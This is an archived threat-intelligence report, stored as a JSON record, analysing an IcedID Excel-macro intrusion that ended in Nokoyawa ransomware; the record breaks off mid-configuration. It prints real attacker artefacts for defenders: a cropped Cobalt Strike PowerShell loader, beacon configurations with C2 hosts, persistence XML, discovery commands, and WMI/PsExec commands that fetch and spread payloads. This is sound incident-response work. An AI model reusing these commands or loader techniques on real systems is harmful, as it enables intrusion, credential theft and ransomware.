{
	"id": "08136038-02ad-4044-a97d-5d4a04e332c1",
	"created_at": "2026-04-06T00:07:12.80953Z",
	"updated_at": "2026-04-10T13:13:03.15474Z",
	"deleted_at": null,
	"sha1_hash": "3daa55dde07770e30de74e806c4c0411f30aecbc",
	"title": "IcedID Macro Ends in Nokoyawa Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10048823,
	"plain_text": "IcedID Macro Ends in Nokoyawa Ransomware\r\nBy editor\r\nPublished: 2023-05-22 · Archived: 2026-04-05 22:05:36 UTC\r\nThreat actors have moved to other means of initial access, such as ISO files combined with LNKs or OneNote payloads, but\r\nsome appearances of VBA macros in Office documents can still be seen in use.\r\nIn this case we document an incident taking place during Q4 of 2022 consisting of threat actors targeting Italian\r\norganizations with Excel maldocs that deploy IcedID. The threat actors deploying such a campaign may hope to target\r\norganizations who have not updated their Microsoft Office deployments after the newly released patches to block macros on\r\ndocuments downloaded from the internet.\r\nWe have previously reported on IcedID intrusions that have migrated to ISO files; however, this report is one of the most\r\nrecent that will focus on the traditional Excel/macro intrusion vector.\r\nOnce inside, the threat actors pivoted using Cobalt Strike and RDP before a domain wide deployment of Nokoyawa\r\nransomware with the help of PsExec. Nokoyawa ransomware is a family with ties to Karma/Nemty.\r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private reports annually, such as this one but more concise and quickly published\r\npost-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking,\r\ndata clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. 
Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nThis intrusion began with a malicious Excel document. We assess with medium-high confidence that this document was\r\ndelivered as part of a malicious email campaign during the first half of October 2022, based on public reporting that\r\noverlaps with multiple characteristics observed. Upon opening the Excel document, the macros would be executed when a\r\nuser clicked on an embedded image. The macro code was responsible for downloading and writing an IcedID DLL payload\r\nto disk. The macro then used a renamed rundll32 binary to execute the malicious DLL.\r\nAfter reaching out to the initial command and control server, automated discovery ran from the IcedID process around two\r\nminutes after execution. This discovery used the same suite of Microsoft binaries as we have previously reported for the\r\nIcedID malware family. At this time, the malware also established persistence on the beachhead host using a scheduled task.\r\nAround two hours after the initial malware ran, IcedID loaded several Cobalt Strike beacons on the beachhead. Within\r\nminutes of running Cobalt Strike on the beachhead the threat actors proceeded to elevate to SYSTEM permissions and dump\r\nLSASS memory using the beacons. Following this activity, the threat actors conducted further reconnaissance, and then\r\nmoved laterally to a Domain Controller through the execution of a Cobalt Strike payload via WMI.\r\nNext, discovery tasks continued from the beachhead host, including network scans for port 1433 (MSSQL) and browsing\r\nnetwork shares with an interest in password files. The threat actors appeared to have removed some contents of the network\r\nshares off the network as canary files report the documents being opened off network minutes later. 
After this, the threat\r\nactors remained quiet over the next several days.\r\nOn the fourth day, the threat actors returned briefly to execute a few commands on the Domain Controller related to the\r\nenumeration of domain computers and high privilege user account groups. Privilege escalation was also observed on the\r\nsystem via named pipe impersonation.\r\nEarly on the sixth day, the threat actors became active again launching the Edge browser on the beachhead host and\r\nappeared to download a file from dropmefiles[.]com. But after completing this, they went silent again for around another\r\neight hours. Then, from the beachhead host, a new process was spawned from the IcedID malware; and from this shell, the\r\nthreat actors began enumerating Active Directory using adget and AdFind.\r\nThe threat actors then began to spread laterally using a combination of Cobalt Strike beacon DLLs, batch scripts, and WMI\r\ncommands. More credential dumping was observed, followed by additional AdFind and other Windows discovery\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 1 of 33\n\ncommands. The threat actors then continued lateral movement and began checking RDP access across the environment. A\r\nbatch file was run enumerating hostnames throughout the environment using nslookup. Some further pivoting around\r\nsystems and targeted discovery continued throughout the rest of the day.\r\nOn the seventh day, around 23 hours since the last activity in the environment the threat actors began the final phase of the\r\nintrusion. The threat actors connected to a compromised server via RDP. From this server they would stage the ransomware\r\ndeployment. They deployed the ransomware payload, Sysinternals PsExec, and a cluster of batch files 1.bat-6.bat and p.bat.\r\nOpening a command prompt, they moved through executing the batch files copying p.bat, a renamed PsExec, and the\r\nransomware payload to all domain joined hosts. 
They then used the batch scripts to execute the ransomware payload via\r\nPsExec and WMI.\r\nThe time to ransomware (TTR) was around 148 hours (~6 days) from the initial infection. After the intrusion, contact was\r\nmade with the threat actors using their support site and the price of the ransom was quoted around $200,000 USD in Bitcoin.\r\nNo ransom was paid as a result of this intrusion.\r\nAnalysts\r\nAnalysis and reporting completed by @iiamaleks, @MittenSec, \u0026 @0xtornado.\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThis intrusion is linked to an IcedID malspam campaign that was observed in October 2022 targeting Italian organizations,\r\nbased on overlap in the maldoc template and the IcedID C2 server.\r\nThis case involved an IcedID payload delivered through an Excel maldoc containing VBA macros that were linked to the\r\ntwo images embedded in the document, which caused the macros to execute when a user clicked on either of the images:\r\nThe macro associated with the maldoc reached out to a hard-coded domain and downloaded the first stage IcedID payload.\r\nMore on this in the next section.\r\nExecution\r\nIcedID\r\nOnce the VBA macro was invoked, Excel connected to the hard-coded domain and downloaded the first stage of the IcedID\r\npayload.\r\nWhen the VBA macro from Excel calls out to the hard-coded domain, the request has several interesting characteristics, including:\r\nTwo OPTIONS requests followed by a GET request.\r\nUser-agent fields mentioning Microsoft Office.\r\nSpecific HTTP headers such as X-Office-Major-Version , X-MSGETWEBURL , X-IDCRL_ACCEPTED , and UA-CPU .\r\nOnce the IcedID payload is successfully retrieved, it will be decoded with Base64 and written to disk. 
In this case, the\r\npayload was written to the path retrieved from Application.DefaultFilePath , which is the default path used by Excel\r\nwhen it opens files.\r\nThe random name generated for the IcedID payload may be either 1 to 7 random digits, or 4500 . This is because the Rnd\r\nfunction will return “a value less than 1 but greater than or equal to zero”.\r\nOnce the IcedID payload is successfully written to disk, the following post deployment steps are initiated:\r\nRundll32.exe is copied into a file named calc.exe under the path returned by Application.DefaultFilePath .\r\nCalc.exe (renamed rundll32.exe) is used to invoke the IcedID payload.\r\nIn this case, rundll32.exe was copied into the user Documents folder and named calc.exe. The name ‘calc.exe’ is hard-coded\r\ninto the VBA code and will not be changed.\r\nOnce the VBA macros invoked the IcedID payload, the parent-child process relationship between Excel and calc.exe was\r\nobserved.\r\nThe following diagram provides a visual summary of the process to execute IcedID on the endpoint.\r\nIcedID VNC\r\nThe threat actors were observed making use of a VNC module that was spawned by IcedID to spawn the Microsoft Edge\r\nbrowser:\r\nWe were able to reconstruct some of the VNC traffic thanks to @0xThiebaut’s tool PCAPeek. You can see the below options\r\nsuch as Edge, Chrome, Firefox, CMD, Task Manager and run dialog. Based on the visual it appears to be the KeyHole VNC\r\nmodule that NVISO first reported in Oct 2022.\r\nIn another instance, a run dialog was observed being used to execute the calc.exe file that was created earlier. 
More\r\ninformation can be found about this here.\r\nHowever, the command below would have no effect in this case as calc.exe is a renamed version of rundll32 and no\r\nparameters were passed.\r\nSeveral other programs were seen run in this manner, as shown in the process execution logs below:\r\nCobalt Strike\r\nThe threat actors used Cobalt Strike beacons throughout the intrusion. The first beacon was executed via PowerShell, which\r\nin turn was executed initially by a command shell started by the IcedID malware; at the same time a DLL beacon\r\nwas also executed.\r\nThe downloaded PowerShell payload, previously hosted on hxxps://aicsoftware[.]com:757/coin, is available on VirusTotal.\r\nHere is the content of the payload, where we can observe an object being created in memory using an encoded string. We\r\nwill walk through decoding this string to view the Cobalt Strike configuration present within.\r\n$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"H4sIAAAAAAAA/9y969OySLIv+nnmr+gPK6K7g16tIqLuiBVxEB\r\n\u003c---CROPPED_BASE64_CODE---\u003e\r\n/Pj8+Pz4/Pj8+Pz4/Pj8+Pz4/Pj83/580/ff/rpD9tj9u3nP96//cu32j9/o//+aX/59sfrKvstOG7CX62jOFzw75r2/du//fSHP1RFf/nj/a9\r\nAfter initial Base64 decoding, we found the payload used the default Cobalt Strike XOR value of 35, which allows for the\r\nnext step of decoding the payload.\r\nSecond stage decoding:\r\nAfter this an MZ header can be observed. From there, the data can be saved and reviewed using 1768.py from Didier\r\nStevens, revealing the Cobalt Strike configuration embedded within:\r\nThe full configuration:\r\nConfig found: xorkey b'.' 
0x00000000 0x0000573e\r\n0x0001 payload type 0x0001 0x0002 8 windows-beacon_https-reverse_https\r\n0x0002 port 0x0001 0x0002 757\r\n0x0003 sleeptime 0x0002 0x0004 62518\r\n0x0004 maxgetsize 0x0002 0x0004 1864736\r\n0x0005 jitter 0x0001 0x0002 37\r\n0x0007 publickey 0x0003 0x0100 30819f302e06092a864886f72e010101050003818d00308189028181\r\n0x0008 server,get-uri 0x0003 0x0100 'aicsoftware\\rcom,/templates'\r\n0x000e SpawnTo 0x0003 0x0010 (NULL ...)\r\n0x001d spawnto_x86 0x0003 0x0040 '%windir%\\\\syswow64\\\\regsvr32\\rexe'\r\n0x001e spawnto_x64 0x0003 0x0040 '%windir%\\\\sysnative\\\\regsvr32\\rexe'\r\n0x001f CryptoScheme 0x0001 0x0002 0\r\n0x001a get-verb 0x0003 0x0010 'GET'\r\n0x001b post-verb 0x0003 0x0010 'POST'\r\n0x001c HttpPostChunk 0x0002 0x0004 0\r\n0x0025 license-id 0x0002 0x0004 305419776\r\n0x0026 bStageCleanup 0x0001 0x0002 1\r\n0x0027 bCFGCaution 0x0001 0x0002 0\r\n0x0009 useragent 0x0003 0x0100 'Mozilla/5\\r0 (Macintosh; Intel Mac OS X 10_11_2) AppleW\r\n0x000a post-uri 0x0003 0x0040 '/favicon'\r\n0x000b Malleable_C2_Instructions 0x0003 0x0100\r\n Transform Input: [7:Input,4,2:600,3,46]\r\n Print\r\n Remove 600 bytes from begin\r\n BASE64\r\n Unknown instruction: 0x2e\r\n0x000c http_get_header 0x0003 0x0200\r\ncomonst_host_header Host: aicsoftware\r\n Const_header Connection: close\r\n Build Metadata: [7:Metadata,46,3,2:wordpress_logged_in=,6:Cookie,9:mark=true]\r\n Unknown instruction: 0x2e\r\n BASE64\r\n Prepend wordpress_logged_in=\r\n Header Cookie\r\n Const_parameter mark=true\r\n0x002e process-inject-transform-x86 0x0003 0x0200 '\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x15Host: aicsoftware\\rcom\\\r\n0x0036 HostHeader 0x0003 0x0080 (NULL ...)\r\n0x0032 UsesCookies 0x0001 0x0002 1\r\n0x0023 proxy_type 0x0001 0x0002 2 IE settings\r\n0x003a TCP_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0039 SMB_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0037 EXIT_FUNK 0x0001 0x0002 0\r\n0x0028 killdate 0x0002 0x0004 0\r\n0x0029 textSectionEnd 0x0002 0x0004 
177872\r\n0x002a feSectionsInfo 0x0003 0x0028 '\\x00À\\x02\\x00r¸\\x03\\x00\\x00À\\x03\\x00\\x88\\x85\\x04\\x00\\x00\\x90\\x\r\n0x002b process-inject-start-rwx 0x0001 0x0002 4 PAGE_READWRITE\r\n0x002c process-inject-use-rwx 0x0001 0x0002 32 PAGE_EXECUTE_READ\r\n0x002d process-inject-min_alloc 0x0002 0x0004 6133\r\n0x000d http_post_header 0x0003 0x0100\r\n Header \r\n0x002f process-inject-transform-x64 0x0003 0x0100 '\\x00\\x00\\x00\\x06\\x90\\x90\\x90\\x90\\x90\\x90'\r\n0x0035 process-inject-stub 0x0003 0x0010 'µJþ\\x01ìjuíó^\\x1aDø½9)'\r\n0x0033 process-inject-execute 0x0003 0x0080 '\\x01\\x04\\x03'\r\n0x0034 process-inject-allocation-method 0x0001 0x0002 0\r\n0x0000\r\nGuessing Cobalt Strike version: 4.2 (max 0x003a)\r\nSanity check Cobalt Strike config: OK\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 8 of 33\n\nAfter using PowerShell beacons during the first day on the beachhead host and a Domain Controller, the threat actors moved\r\nto using DLL files exclusively for the remainder of Cobalt Strike beacons deployed during the intrusion. Other notable\r\nexecutions included the use of batch files:\r\nC:\\Windows\\system32\\cmd.exe /c c:\\windows\\temp\\1.bat\r\n-\u003e rundll32.exe c:\\windows\\temp\\1.dll, DllRegisterServer\r\nPersistence\r\nDuring the initial execution of IcedID, the following two files were created under the AppData Roaming folder of the user\r\nthat executed it:\r\nexdudipo.dll: IcedID first stage.\r\nlicense.dat: Encoded version of the second stage which the first stage will load into memory.\r\nA scheduled task was created that contained instructions on executing the IcedID DLL and the location of the license.dat\r\nfile. 
This is a very common method that IcedID has used for persistence.\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cURI\u003e\\{3774AD25-8218-8099-89BA-CE96C6E9DC4E}\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n \u003cTimeTrigger id=\"TimeTrigger\"\u003e\r\n \u003cRepetition\u003e\r\n \u003cInterval\u003ePT1H\u003c/Interval\u003e\r\n \u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n \u003c/Repetition\u003e\r\n \u003cStartBoundary\u003e2012-01-01T12:00:00\u003c/StartBoundary\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003c/TimeTrigger\u003e\r\n \u003cLogonTrigger id=\"LogonTrigger\"\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cUserId\u003e[REDACTED USER]\u003c/UserId\u003e\r\n \u003c/LogonTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n \u003cRunLevel\u003eHighestAvailable\u003c/RunLevel\u003e\r\n \u003cUserId\u003e[REDACTED DOMAIN]\\[REDACTED USER]\u003c/UserId\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003efalse\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cDuration\u003ePT10M\u003c/Duration\u003e\r\n \u003cWaitTimeout\u003ePT1H\u003c/WaitTimeout\u003e\r\n 
\u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 9 of 33\n\n\u003cExec\u003e\r\n \u003cCommand\u003erundll32.exe\u003c/Command\u003e\r\n \u003cArguments\u003e\"C:\\Users\\[REDACTED USER]\\AppData\\Roaming\\{02959BFD-29E0-6A95-3B77-5E55B8D01CB7}\\{CA2AB541-E1\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nThe scheduled task was configured to execute every hour.\r\nPrivilege Escalation\r\nPrivilege escalation was completed on two systems via the named pipe GetSystem feature within the Cobalt Strike tool. 
An\r\nexample is shown below via Sysmon event ID 1 – ProcessCreate Rule:\r\nDefense Evasion\r\nThis intrusion displayed numerous techniques used by threat actors to evade detection.\r\nProcess Injection\r\nThe adversary was seen injecting code into legitimate processes via CreateRemoteThread, which can be detected using\r\nSysmon event ID 8.\r\nThe table below shows examples of injected processes found via an in-memory YARA scan using this Malpedia YARA rule:\r\nHost ProcessID ProcessName CommandLine\r\nworkstation.domain.local 612 winlogon.exe winlogon.exe\r\nworkstation.domain.local 828 svchost.exe C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p\r\nfileshare.domain.local 760 svchost.exe C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p\r\nfileshare.domain.local 4928 winlogon.exe winlogon.exe\r\nfileshare.domain.local 1960 rundll32.exe rundll32.exe c:\\windows\\temp\\1.dll\r\nbeachhead.domain.local 712 lsass.exe C:\\Windows\\system32\\lsass.exe\r\nbeachhead.domain.local 812 svchost.exe C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbS\r\nbeachhead.domain.local 5884 TextInputHost.exe C:\\Windows\\SystemApps\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\TextIn -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca\r\nbeachhead.domain.local 2036 sysmon64.exe C:\\Windows\\sysmon64.exe -z syscliprpc9E7B7D3FAF371803\r\nbeachhead.domain.local 2568 regsvr32.exe C:\\Windows\\syswow64\\regsvr32.exe\r\nbeachhead.domain.local 9760 cmd.exe C:\\Windows\\SysWOW64\\cmd.exe\r\nserver.domain.local 432 rundll32.exe rundll32.exe 1.dll\r\nFile Deletion\r\nFiles that were dropped in temporary directories were deleted after execution, as seen below with Sysmon event IDs 11 and\r\n23.\r\nBelow is the list of files seen being created and later deleted by the threat 
actor:\r\n7.exe\r\nadfind.bat\r\nadfind.exe\r\nadget.exe\r\nad.7z\r\n1.bat\r\n1.dll\r\n7.exe\r\nns.bat\r\nRenamed System Utilities\r\nAdversaries typically rename common Windows system utilities to avoid triggering alerts that monitor utility usage. The\r\ntable below summarizes the renamed utilities observed in this intrusion.\r\nWindows Utility Renamed Windows Utility\r\nrundll32.exe C:\\Users\\\u003cREDACTED\u003e\\Documents\\calc.exe\r\npsexesvc.exe C:\\Windows\\mstdc.exe\r\nCredential Access\r\nThe threat actors were observed accessing a file server and browsing through files related to passwords. These would later be\r\nobserved being opened off network; see the exfiltration section for more details on that activity.\r\nOn the second day of the intrusion, after moving laterally to a Domain Controller, LSASS was accessed from a Cobalt Strike\r\nprocess. The access granted value 0x1010 was observed. As noted in a previous report, this value matches known mimikatz\r\naccess patterns. This logged event suggests Cobalt Strike accessed LSASS to dump credentials from memory. This activity\r\nwas observed again on various hosts on the fourth and sixth days of the intrusion.\r\nDiscovery\r\nThe discovery phase primarily utilized built-in Windows tools. One utility seen was chcp, which allows you to display or\r\nset the code page number. The default chcp value is determined by the Windows locale. The locale can indicate the\r\nlanguage, country, and regional standards of that host (e.g. date and time formatting). After viewing the default code page,\r\nthe adversary changed the value to 65001 to reflect the UTF-8 character set. 
We have seen this as a technique employed\r\nby IcedID for some time as reported in depth in prior cases.\r\narp -a\r\nchcp \u003e\u00262\r\nchcp 65001\r\nchcp 65001 \u0026\u0026 c: \u0026\u0026 cd c:\\\r\ndir \\\\\u003cREDACTED\u003e\\c$\r\nipconfig /all\r\nnet config workstation\r\nnet group \"Domain Admins\" /domain\r\nnet group \"Domain Computers\" /domain\r\nnet group \"domain admins\" /dom\r\nnet group \"enterprise admins\" /dom\r\nnet localgroup \"administrators\" /dom\r\nnet view /all\r\nnet view /all /domain\r\nnet1 config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nping \u003cHOST_IP\u003e\r\nsysteminfo\r\nwhoami\r\nwhoami /upn\r\nFollowing the initial discovery commands mentioned above on day one, the threat actor scanned the network for port 1433,\r\nthe default port used by Microsoft SQL server.\r\nThe discovery phase remained minimal leading into day six. 
The threat actors were seen dropping AdFind and adget.exe to\r\nreveal all users, groups, computers, organizational units, subnets, and trust objects within the domain.\r\nadfind.exe -gcb -sc trustdmp\r\nadfind.exe -f (objectcategory=group)\r\nadfind.exe -subnets -f (objectCategory=subnet)\r\nadfind.exe -f (objectcategory=organizationalUnit)\r\nadfind.exe -f objectcategory=computer\r\nadfind.exe -f (objectcategory=person)\r\nAdget is a newer tool that we first observed in this previous report; it generally performs AD discovery similar to\r\nAdFind.\r\nFollowing the Active Directory discovery activity, additional remote discovery actions were observed using WMI to gather\r\ninformation about Windows OS version and licensing on the hosts.\r\nC:\\Windows\\system32\\cmd.exe /C wmic /node:\"REDACTED\" /user:\"USER\" /password:\"REDACTED\" os get caption\r\nThen another recon round occurred using NSLOOKUP to map assets to IP addresses.\r\nThis was followed by network scans for RDP:\r\nLateral Movement\r\nDuring this intrusion, threat actors used a number of different techniques to move laterally across the domain. 
The\r\ntechniques used will be detailed in the following sections.\r\nT1021.006 Remote Services: WinRM\r\nSome of the threat actors’ lateral activity was executed using WinRM; this could be observed by matching parent-child\r\nprocess trees and DCE RPC traffic.\r\nT1047 WMI\r\nThreat actors ran the following command to download and execute an in-memory PowerShell payload on a domain\r\ncontroller:\r\nC:\\\\Windows\\\\System32\\\\wbem\\\\wmic.exe /node:REDACTED process call create \\\"\"cmd.exe /c powershell.exe -nop -w\r\nWMI was also used when executing remote DLL beacons:\r\nC:\\Windows\\system32\\cmd.exe /C wmic /node:\"REDACTED\" process call create \"c:\\windows\\system32\\rundll32.exe c:\\\r\nWMI commands were also observed during ransom deployment:\r\nwmic /node:REDACTED /user:DOMAIN\\USER /password:REDACTED process call create cmd.exe /c copy \\\\REDACTED\\c$\\win\r\nT1021.002 Remote Services: SMB/Windows Admin Shares\r\nThe threat actors relied on SMB to move their tools throughout the network during the intrusion.\r\nThe threat actors used PsExec to move laterally to servers during the ransom execution; the -r flag was used to rename the\r\nbinary created on the remote server to mstdc.exe .\r\nBelow are some of the PsExec forensic artifacts logged in Windows Event Logs and Sysmon:\r\nOverview of the mstdc.exe binary (renamed psexecsvc.exe):\r\nRenaming PsExec is likely an action taken by threat actors to bypass basic PsExec anomaly rules. 
However, there are Sigma\r\nrules which detect this specific technique, as shared by Florian Roth back in 2019.\r\nThey also used the Windows copy utility to move files around the network via SMB:\r\ncmd.exe /c copy \\\\REDACTED\\c$\\windows\\temp\\p.bat c:\\windows\\temp\\\r\nT1021.001 Remote Services: RDP\r\nThreat actors also used RDP during this intrusion. Below is an example of forensic artifacts left after using RDP to move\r\nlaterally from the beachhead to one of the domain servers, logged in Windows Event Logs by different providers:\r\nCollection\r\nDuring discovery actions, the threat actors were observed using 7-Zip to archive data collected from Active Directory using\r\nAdFind.\r\n7.exe a -mx3 ad.7z ad_*\r\nCommand and Control\r\nIcedID\r\nIn this case IcedID was observed with the campaign ID of 3298576311 communicating with a C2 server located at\r\nkicknocisd[.]com.\r\nSuricata Rule Name Domain IP AS ORG Country\r\nET MALWARE Win32/IcedID Request Cookie kicknocisd[.]com 159.65.169[.]200 DIGITALOCEAN-ASN United States\r\nAfter initial connections, IcedID command and control traffic moved to the following servers.\r\nDomain IP Port JA3 JA3s\r\ncurabiebarristie[.]com 198.244.180.66 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc\r\nstayersa[.]art 198.244.180.66 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc\r\nguaracheza[.]pics 45.66.248.119 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc\r\nbelliecow[.]wiki 45.66.248.119 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc\r\nConnections to one of the IcedID servers were observed in memory dumps from the beachhead host. 
This evidence is\r\nconsistent with the connections to 45.66.248[.]119 observed from the renamed rundll32.exe that loaded the IcedID DLL\r\nduring maldoc execution at the beginning of this case.\r\nBackConnect VNC\r\nDuring the intrusion we also observed connections to a BackConnect VNC IP address. These connections were also\r\nspawned from the running IcedID process on the beachhead host.\r\nThe following alerts from Lenny Hansson’s ruleset fired on the traffic:\r\nSuricata Alert IP Port\r\nNF – Malware IcedID BackConnect – Wait Command 137.74.104.108 8080\r\nNF – Malware IcedID BackConnect – Start VNC command – 11 137.74.104.108 8080\r\nHere’s another look at the VNC GUI from the attackers’ standpoint.\r\nIn the execution section we covered utilities launched by the threat actors from the VNC activity.\r\nWeb Service\r\nOn the sixth day, the threat actors launched an Edge browser on the beachhead host, via VNC as described in the execution\r\nsection, and connected to the site dropmefiles[.]com, a site that offers free file transfer services. Data connections from the\r\nEdge browser in the SRUMDB indicate that a file download occurred, but we were unable to determine what the file was or\r\nits purpose related to the intrusion.\r\nCobalt Strike\r\nT1071 / S0154\r\nThe threat actors dropped and executed a malicious DLL, p1.dll, on the beachhead. This malicious DLL is a Cobalt Strike\r\nbeacon reaching out to 23.29.115.152/aicsoftware[.]com on ports 757 and 8080. Later the threat actors also injected further\r\nbeacons into memory reaching out to 50.3.132.232/iconnectgs[.]com on port 8081. 
Later on day six, the threat actors added\r\na new Cobalt Strike server to the intrusion, 5.8.18.242 on port 443 (see below for visualizing this activity).\r\nBeaconing\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 18 of 33\n\nBelow is a screenshot of a packet captured from C2 traffic over HTTP. Encrypted POST requests made to iconnectgs[.]com\r\n(50.3.132[.]232) are seen:\r\nCobalt Strike Configurations\r\nDomain IP Port JA3 JA3s\r\naicsoftware[.]com 23.29.115.152 757 a0e9f5d64349fb13191bc781f81f42e1 f176ba63b4d68e576b5ba345bec2c7b7\r\naicsoftware[.]com 23.29.115.152 8080 N/A N/A\r\n{\r\n \"beacontype\": [\r\n \"HTTP\"\r\n ],\r\n \"sleeptime\": 62518,\r\n \"jitter\": 37,\r\n \"maxgetsize\": 1398708,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 305419776,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"aicsoftware.com\",\r\n \"port\": 8080,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCTgLGIvbpnfCb/itwv1b3pfVlfzKp7OJvlLCx21brRU3EF8QXj\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/br.js\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"prepend 600 characters\",\r\n \"base64\",\r\n \"mask\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/es\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 19 of 33\n\n\"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n 
\"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\regsvr32.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\regsvr32.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"VirtualAllocEx\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"RtlCreateUserThread\",\r\n \"CreateRemoteThread\"\r\n ],\r\n \"min_alloc\": 6133,\r\n \"startrwx\": false,\r\n \"stub\": \"tUr+Aexqde3zXhpE+L05KQ==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": 